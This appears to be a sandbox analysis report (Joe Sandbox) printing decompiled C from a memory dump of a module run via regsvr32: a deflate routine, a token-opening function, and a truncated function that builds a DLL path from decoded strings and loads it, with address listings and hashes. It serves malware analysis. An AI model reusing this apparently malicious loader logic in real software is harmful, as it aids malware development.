                                                                                                                                                                        			E049F4100(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xfed1e900
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0xbde85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E049F7120(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E049F5E80(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xbde85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E049F5FC0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8341ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xed7505f9
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xbde85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8341ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E049F5FC0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xfed1e900
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xbde85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xbde85000
							E049F7120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E049F5E80( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xbde85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                                                                                                                                                                        0x049f4106
                                                                                                                                                                        0x049f410b
                                                                                                                                                                        0x049f410f
                                                                                                                                                                        0x049f4112
                                                                                                                                                                        0x049f4112
                                                                                                                                                                        0x049f4115
                                                                                                                                                                        0x049f411a
                                                                                                                                                                        0x049f411f
                                                                                                                                                                        0x049f4122
                                                                                                                                                                        0x049f4127
                                                                                                                                                                        0x049f412a
                                                                                                                                                                        0x049f4130
                                                                                                                                                                        0x049f4130
                                                                                                                                                                        0x049f413b
                                                                                                                                                                        0x049f413e
                                                                                                                                                                        0x049f4145
                                                                                                                                                                        0x049f414a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4150
                                                                                                                                                                        0x049f4155
                                                                                                                                                                        0x049f4155
                                                                                                                                                                        0x049f415a
                                                                                                                                                                        0x049f4160
                                                                                                                                                                        0x049f416a
                                                                                                                                                                        0x049f416f
                                                                                                                                                                        0x049f4175
                                                                                                                                                                        0x049f4194
                                                                                                                                                                        0x049f4197
                                                                                                                                                                        0x049f41a2
                                                                                                                                                                        0x049f41a2
                                                                                                                                                                        0x049f41a2
                                                                                                                                                                        0x049f4199
                                                                                                                                                                        0x049f4199
                                                                                                                                                                        0x049f419b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f419d
                                                                                                                                                                        0x049f419d
                                                                                                                                                                        0x049f419d
                                                                                                                                                                        0x049f419b
                                                                                                                                                                        0x049f41aa
                                                                                                                                                                        0x049f41af
                                                                                                                                                                        0x049f41b4
                                                                                                                                                                        0x049f41ba
                                                                                                                                                                        0x049f41be
                                                                                                                                                                        0x049f41c1
                                                                                                                                                                        0x049f41c4
                                                                                                                                                                        0x049f41ca
                                                                                                                                                                        0x049f41cf
                                                                                                                                                                        0x049f41d2
                                                                                                                                                                        0x049f41d8
                                                                                                                                                                        0x049f41dd
                                                                                                                                                                        0x049f41e3
                                                                                                                                                                        0x049f41e9
                                                                                                                                                                        0x049f41ee
                                                                                                                                                                        0x049f41f1
                                                                                                                                                                        0x049f41f6
                                                                                                                                                                        0x049f41fa
                                                                                                                                                                        0x049f41fe
                                                                                                                                                                        0x049f4201
                                                                                                                                                                        0x049f4204
                                                                                                                                                                        0x049f420d
                                                                                                                                                                        0x049f4214
                                                                                                                                                                        0x049f4217
                                                                                                                                                                        0x049f421a
                                                                                                                                                                        0x049f421f
                                                                                                                                                                        0x049f4224
                                                                                                                                                                        0x049f4227
                                                                                                                                                                        0x049f422a
                                                                                                                                                                        0x049f422a
                                                                                                                                                                        0x049f422e
                                                                                                                                                                        0x049f4237
                                                                                                                                                                        0x049f423e
                                                                                                                                                                        0x049f4241
                                                                                                                                                                        0x049f4246
                                                                                                                                                                        0x049f424b
                                                                                                                                                                        0x049f424b
                                                                                                                                                                        0x049f424e
                                                                                                                                                                        0x049f4253
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4177
                                                                                                                                                                        0x049f4179
                                                                                                                                                                        0x049f4186
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4186
                                                                                                                                                                        0x049f4179
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4175
                                                                                                                                                                        0x049f4259
                                                                                                                                                                        0x049f425e
                                                                                                                                                                        0x049f4261
                                                                                                                                                                        0x049f4264
                                                                                                                                                                        0x049f430f
                                                                                                                                                                        0x049f430f
                                                                                                                                                                        0x049f426a
                                                                                                                                                                        0x049f426a
                                                                                                                                                                        0x049f426a
                                                                                                                                                                        0x049f426f
                                                                                                                                                                        0x049f4299
                                                                                                                                                                        0x049f429c
                                                                                                                                                                        0x049f429c
                                                                                                                                                                        0x049f42a1
                                                                                                                                                                        0x049f42a3
                                                                                                                                                                        0x049f42a5
                                                                                                                                                                        0x049f42a8
                                                                                                                                                                        0x049f42ab
                                                                                                                                                                        0x049f42b3
                                                                                                                                                                        0x049f42b8
                                                                                                                                                                        0x049f42b8
                                                                                                                                                                        0x049f42be
                                                                                                                                                                        0x049f42c1
                                                                                                                                                                        0x049f42c4
                                                                                                                                                                        0x049f42c7
                                                                                                                                                                        0x049f42c9
                                                                                                                                                                        0x049f42c9
                                                                                                                                                                        0x049f42ca
                                                                                                                                                                        0x049f42ca
                                                                                                                                                                        0x049f42c7
                                                                                                                                                                        0x049f42d8
                                                                                                                                                                        0x049f42db
                                                                                                                                                                        0x049f42df
                                                                                                                                                                        0x049f42e4
                                                                                                                                                                        0x049f42e7
                                                                                                                                                                        0x049f42ea
                                                                                                                                                                        0x049f42ea
                                                                                                                                                                        0x049f42ea
                                                                                                                                                                        0x049f42ed
                                                                                                                                                                        0x049f42ed
                                                                                                                                                                        0x049f42f0
                                                                                                                                                                        0x049f42f0
                                                                                                                                                                        0x049f4271
                                                                                                                                                                        0x049f4271
                                                                                                                                                                        0x049f4281
                                                                                                                                                                        0x049f4284
                                                                                                                                                                        0x049f4289
                                                                                                                                                                        0x049f4289
                                                                                                                                                                        0x049f428c
                                                                                                                                                                        0x049f428f
                                                                                                                                                                        0x049f4292
                                                                                                                                                                        0x049f4294
                                                                                                                                                                        0x049f4294
                                                                                                                                                                        0x049f42f3
                                                                                                                                                                        0x049f42f5
                                                                                                                                                                        0x049f42f8
                                                                                                                                                                        0x049f42f8
                                                                                                                                                                        0x049f42fe
                                                                                                                                                                        0x049f4302
                                                                                                                                                                        0x049f4305
                                                                                                                                                                        0x049f4307
                                                                                                                                                                        0x049f4307
                                                                                                                                                                        0x049f4318
                                                                                                                                                                        0x049f431a
                                                                                                                                                                        0x049f431a
                                                                                                                                                                        0x049f4322
                                                                                                                                                                        0x049f4330
                                                                                                                                                                        0x049f4333
                                                                                                                                                                        0x049f4335
                                                                                                                                                                        0x049f4355
                                                                                                                                                                        0x049f4355
                                                                                                                                                                        0x049f4358
                                                                                                                                                                        0x049f435e
                                                                                                                                                                        0x049f435f
                                                                                                                                                                        0x049f4362
                                                                                                                                                                        0x049f4364
                                                                                                                                                                        0x049f4367
                                                                                                                                                                        0x049f436a
                                                                                                                                                                        0x049f436d
                                                                                                                                                                        0x049f4371
                                                                                                                                                                        0x049f4374
                                                                                                                                                                        0x049f4377
                                                                                                                                                                        0x049f437a
                                                                                                                                                                        0x049f437c
                                                                                                                                                                        0x049f437c
                                                                                                                                                                        0x049f437f
                                                                                                                                                                        0x049f4381
                                                                                                                                                                        0x049f4381
                                                                                                                                                                        0x049f4384
                                                                                                                                                                        0x049f4386
                                                                                                                                                                        0x049f4389
                                                                                                                                                                        0x049f4391
                                                                                                                                                                        0x049f4394
                                                                                                                                                                        0x049f4399
                                                                                                                                                                        0x049f4399
                                                                                                                                                                        0x049f439f
                                                                                                                                                                        0x049f43a2
                                                                                                                                                                        0x049f43a5
                                                                                                                                                                        0x049f43a7
                                                                                                                                                                        0x049f43a7
                                                                                                                                                                        0x049f43a8
                                                                                                                                                                        0x049f43a8
                                                                                                                                                                        0x049f43b3
                                                                                                                                                                        0x049f43b3
                                                                                                                                                                        0x049f43b3
                                                                                                                                                                        0x049f43b6
                                                                                                                                                                        0x049f43b9
                                                                                                                                                                        0x049f43b9
                                                                                                                                                                        0x049f43bc
                                                                                                                                                                        0x049f43bc
                                                                                                                                                                        0x049f437f
                                                                                                                                                                        0x049f43bf
                                                                                                                                                                        0x049f43c2
                                                                                                                                                                        0x049f43c5
                                                                                                                                                                        0x049f43c7
                                                                                                                                                                        0x049f43ca
                                                                                                                                                                        0x049f43cc
                                                                                                                                                                        0x049f43cf
                                                                                                                                                                        0x049f43d2
                                                                                                                                                                        0x049f43d4
                                                                                                                                                                        0x049f43d7
                                                                                                                                                                        0x049f43df
                                                                                                                                                                        0x049f43e7
                                                                                                                                                                        0x049f43ea
                                                                                                                                                                        0x049f43ea
                                                                                                                                                                        0x049f43ea
                                                                                                                                                                        0x049f43ed
                                                                                                                                                                        0x049f43ed
                                                                                                                                                                        0x049f43ed
                                                                                                                                                                        0x049f43f0
                                                                                                                                                                        0x049f43f6
                                                                                                                                                                        0x049f43f8
                                                                                                                                                                        0x049f43f8
                                                                                                                                                                        0x049f43fe
                                                                                                                                                                        0x049f4404
                                                                                                                                                                        0x049f440d
                                                                                                                                                                        0x049f4414
                                                                                                                                                                        0x049f4416
                                                                                                                                                                        0x049f4419
                                                                                                                                                                        0x049f4419
                                                                                                                                                                        0x049f441c
                                                                                                                                                                        0x049f441c
                                                                                                                                                                        0x049f441f
                                                                                                                                                                        0x049f4421
                                                                                                                                                                        0x049f4424
                                                                                                                                                                        0x049f4426
                                                                                                                                                                        0x049f4441
                                                                                                                                                                        0x049f4441
                                                                                                                                                                        0x049f4445
                                                                                                                                                                        0x049f4448
                                                                                                                                                                        0x049f444b
                                                                                                                                                                        0x049f444e
                                                                                                                                                                        0x049f4464
                                                                                                                                                                        0x049f4464
                                                                                                                                                                        0x049f4464
                                                                                                                                                                        0x049f4450
                                                                                                                                                                        0x049f4450
                                                                                                                                                                        0x049f4452
                                                                                                                                                                        0x049f4456
                                                                                                                                                                        0x049f4459
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f445b
                                                                                                                                                                        0x049f445b
                                                                                                                                                                        0x049f445d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f445f
                                                                                                                                                                        0x049f445f
                                                                                                                                                                        0x049f445f
                                                                                                                                                                        0x049f445d
                                                                                                                                                                        0x049f4459
                                                                                                                                                                        0x049f4468
                                                                                                                                                                        0x049f446b
                                                                                                                                                                        0x049f4470
                                                                                                                                                                        0x049f447a
                                                                                                                                                                        0x049f447a
                                                                                                                                                                        0x049f447a
                                                                                                                                                                        0x049f447d
                                                                                                                                                                        0x049f4428
                                                                                                                                                                        0x049f4428
                                                                                                                                                                        0x049f442a
                                                                                                                                                                        0x049f4431
                                                                                                                                                                        0x049f4431
                                                                                                                                                                        0x049f4433
                                                                                                                                                                        0x049f4435
                                                                                                                                                                        0x049f4437
                                                                                                                                                                        0x049f443b
                                                                                                                                                                        0x049f443d
                                                                                                                                                                        0x049f443f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f443f
                                                                                                                                                                        0x049f443b
                                                                                                                                                                        0x049f442c
                                                                                                                                                                        0x049f442c
                                                                                                                                                                        0x049f442f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f442f
                                                                                                                                                                        0x049f442a
                                                                                                                                                                        0x049f4487
                                                                                                                                                                        0x049f4489
                                                                                                                                                                        0x049f4489
                                                                                                                                                                        0x049f4494
                                                                                                                                                                        0x049f4337
                                                                                                                                                                        0x049f4337
                                                                                                                                                                        0x049f433a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f433c
                                                                                                                                                                        0x049f433c
                                                                                                                                                                        0x049f433e
                                                                                                                                                                        0x049f4342
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4344
                                                                                                                                                                        0x049f4344
                                                                                                                                                                        0x049f4344
                                                                                                                                                                        0x049f4347
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f434b
                                                                                                                                                                        0x049f4354
                                                                                                                                                                        0x049f4354
                                                                                                                                                                        0x049f4347
                                                                                                                                                                        0x049f4342
                                                                                                                                                                        0x049f433a
                                                                                                                                                                        0x049f4326
                                                                                                                                                                        0x049f432f
                                                                                                                                                                        0x049f432f

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                        • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction ID: 7f01a3e6c351eab75191d4abc7defdb4d85f75acdcc41ff26552c13d57dd1af7
                                                                                                                                                                        • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 86D112716006009FDB24CF69D9C0AAAB7E5FF98318B24893DE98ACB701D771F9448B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EC79E Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049EC79E(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x49ff818; // 0x4bef8b0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}






                                                                                                                                                                        0x049ec7bd
                                                                                                                                                                        0x049ec7ef
                                                                                                                                                                        0x049ec7ef
                                                                                                                                                                        0x049ec7bf
                                                                                                                                                                        0x049ec7ca
                                                                                                                                                                        0x049ec7eb
                                                                                                                                                                        0x049ec7eb
                                                                                                                                                                        0x049ec7cc
                                                                                                                                                                        0x049ec7d6
                                                                                                                                                                        0x049ec7e9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ec7e9
                                                                                                                                                                        0x049ec7ca
                                                                                                                                                                        0x049ec7f4

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 049EC7B1
                                                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,049EC8E3,00000000,049E0000), ref: 049EC7B8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,049EC8E3,00000000,049E0000), ref: 049EC7BF
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,049EC8E3,00000000,049E0000), ref: 049EC7E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1515895013-0
                                                                                                                                                                        • Opcode ID: 34ff89e84737645b2153ab9281f2a4397d0c08c71887eb85dc717cb909ff0cfa
                                                                                                                                                                        • Instruction ID: a85d1f8d3743dacd5d0a438782bf5fdf7ccb7fe3a352cee88c429612b326a5a2
                                                                                                                                                                        • Opcode Fuzzy Hash: 34ff89e84737645b2153ab9281f2a4397d0c08c71887eb85dc717cb909ff0cfa
                                                                                                                                                                        • Instruction Fuzzy Hash: 34F05E72604205AFDB019FA5D849FAA3BFCFB49340F040475F642E3140E765FE008BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049ED218 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E049ED218(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x49ff81c; // 0x4befbe8
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E049E9DF2(_t50, 0x392);
					_t66 =  *0x49ff81c; // 0x4befbe8
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E049E9E51( &_v140, 0x40, L"%08x", E049EE2C5(_t66 + 0xb0, E049EA43D(_t66 + 0xb0), 0));
					_t20 =  *0x49ff81c; // 0x4befbe8
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E049E9DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
					_t26 =  *0x49ff81c; // 0x4befbe8
					_t68 = E049E9A5A(_t26 + 0x1020);
					_v12 = _t68;
					E049E8BAF( &_v8);
					_t32 =  *0x49ff81c; // 0x4befbe8
					_t34 = E049E9A5A(_t32 + 0x122a);
					 *0x49ff91c = _t34;
					_t35 =  *0x49ff818; // 0x4bef8b0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x49fc9a0,  &_v140, ".", L"dll", 0, 0x49fc9a0, _t25, 0x49fc9a0, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x49ff91c);
					 *0x49ff914 = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E049EF011(0x49fcb8c, _t60);
					}
					 *0x49ff918 = _t38;
					E049E8BF4( &_v12, 0xfffffffe);
					E049E8D6D( &_v140, 0, 0x80);
					if( *0x49ff918 != 0) {
						goto L10;
					} else {
						E049E8BF4(0x49ff91c, 0xfffffffe);
						goto L8;
